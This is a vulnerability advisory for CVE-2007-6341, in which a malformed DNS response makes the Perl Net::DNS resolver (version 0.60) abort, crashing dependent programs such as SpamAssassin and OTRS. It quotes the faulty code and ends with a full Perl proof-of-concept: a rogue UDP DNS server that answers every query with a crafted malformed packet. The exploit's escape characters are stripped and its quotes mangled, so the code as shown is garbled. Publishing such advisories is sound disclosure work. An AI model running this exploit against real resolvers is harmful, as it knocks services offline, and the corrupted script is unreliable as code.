‘Net::DNS Malformed Packet DoS’

Summary

Net::DNS is ‘a DNS resolver implemented in Perl. It allows the programmer to perform nearly any type of DNS query from a Perl script’. beSTORM’s DNS Server module has been able to detect a vulnerability in Net::DNS allows a malicious server to cause the Net::DNS package to crash by sending it a malformed DNS response, this in turn would cause any product using the package to crash with it.’

Credit:

‘The information has been provided by beSTORM.
The original article can be found at: http://www.beyondsecurity.com/bestorm_overview.html


Details

Vulnerable Systems:
 * Net::DNS version 0.60 build 654

It is possible to cause Net::DNS to ‘croak’ by responding to it with a malformed DNS response.

The croak itself doesn’t allow you to overflow or execute arbitrary code, but as it cannot be captured using normal Perl code – as with an eval() function for example – a user of the Net::DNS package can be caused to ‘crash’, his program to forcefully terminate if it encounters this DNS response.

The problem steams from the fact that:
if ($self->{‘rdlength’} > 0) {
$self->{‘address’} = inet_ntoa(substr($$data, $offset, 4));
}

found in Net/DNS/RR/A.pm

Doesn’t properly verify that $$data has 4 bytes to read before attempting to substr – which in turn causes the data sent to inet_ntoa to not have enough bytes which causes this code:
ip_address = SvPVbyte(ip_address_sv, addrlen);
if (addrlen == sizeof(addr) || addrlen == 4)
addr.s_addr =
(ip_address[0] & 0xFF) << 24 |
(ip_address[1] & 0xFF) << 16 |
(ip_address[2] & 0xFF) << 8 |
(ip_address[3] & 0xFF);
else
croak(‘Bad arg length for %s, length is %d, should be %d’, ‘Socket::inet_ntoa’, addrlen, sizeof(addr));

To issue a ‘croak’ – causing the perl to abort.

Severity:
The vulnerability itself doesn’t pose any problem as Socket::inet_ntoa handles it as expected, seriousness of this vulnerability is caused by the fact that several other packages such as SpamAssassin and OTRS rely on Net::DNS for resolving hostnames – this could at the very least be a nuisance where an attacker can crash the daemons run by these two programs.

Vendor status:
We have reported this issue to Net::DNS 6 weeks ago: Security issue with Net::DNS::Resolver, but no response has been received.

CVE Information:
CVE-2007-6341

Exploit:
#!/usr/bin/perl
# Beyond Security(c)
# Vulnerability found by beSTORM – DNS Server module

use strict;
use IO::Socket;
my($sock, $oldmsg, $newmsg, $hisaddr, $hishost, $MAXLEN, $PORTNO);
$MAXLEN = 1024;
$PORTNO = 5351;
$sock = IO::Socket::INET->new(LocalPort => $PORTNO, Proto => ‘udp’) or die ‘socket: $@’;
print ‘Awaiting UDP messages on port $PORTNOn’;

my $oldmsg = ‘x5ax40x81x80x00x01x00x01x00x01x00x01x07x63x72x61’.
‘x63x6bx6dx65x0ax6dx61x73x74x65x72x63x61x72x64x03’.
‘x63x6fx6dx00x00x01x00x01x03x77x77x77x0ex62x65x79’.
‘x6fx6ex64x73x65x63x75x72x69x74x79x03x63x6fx6dx00’.
‘x00x01x00x01x00x00x00x01x00x04xc0xa8x01x02x0ex62’.
‘x65x79x6fx6ex64x73x65x63x75x72x69x74x79x03x63x6f’.
‘x6dx00x00x02x00x01x00x00x00x01x00x1bx02x6ex73x03’.
‘x77x77x77x0ex62x65x79x6fx6ex64x73x65x63x75x72x69’.
‘x74x79x03x63x6fx6dx00x02x6ex73x0ex62x65x79x6fx6e’.
‘x64x73x65x63x75x72x69x74x79x03x63x6fx6dx00x00x01’.
‘x00x01x00x00x00x01x00x01x41’;
while ($sock->recv($newmsg, $MAXLEN)) {
 my($port, $ipaddr) = sockaddr_in($sock->peername);
 $hishost = gethostbyaddr($ipaddr, AF_INET);
 print ‘Client $hishost said “$newmsg”n’;
 $sock->send($oldmsg);
 $oldmsg = ‘[$hishost] $newmsg’;
}
die ‘recv: $!’;’

Categories: UNIX